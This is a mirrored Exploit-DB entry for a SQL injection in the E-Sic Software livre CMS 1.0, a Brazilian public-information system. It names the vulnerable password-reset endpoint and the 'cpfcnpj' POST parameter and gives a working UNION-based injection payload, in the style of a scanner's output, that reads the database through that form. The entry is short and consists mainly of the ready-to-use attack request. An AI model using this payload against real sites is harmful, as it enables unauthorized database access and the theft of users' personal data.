bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/42981.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

27 lines
1 KiB
Text
Raw Blame History

# Exploit Title: E-Sic Software livre CMS - Sql Injection
# Date: 12/10/2017
# Exploit Author: Elber Tavares
# fireshellsecurity.team/
# Vendor Homepage: https://softwarepublico.gov.br/
# Version: 1.0
# Tested on: kali linux, windows 7, 8.1, 10 - Firefox
# Download: https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:
http://whiteboyz.xyz/esic-software-publico-sql-injection.html
vulnerability is in the password reset parameter of the software,
where we can send sql parameters and interact directly with the
database. "Informe seu CPF ou CNPJ para enviarmos nova senha:"
---------------------------------------------------------------------
Url: http://vulnerablesite/esic/reset/
POST: cpfcnpj=test&btsub=Enviar
Parameter: cpfcnpj (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: cpfcnpj=test' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT
('qbqqq','HMDStbPURehioEoBDmsawJnddTBZoNxMrwIeJWFR'),'qzbpq'),NULL,NULL--
GJkR&btsub=Enviar
Reference in a new issue View git blame Copy permalink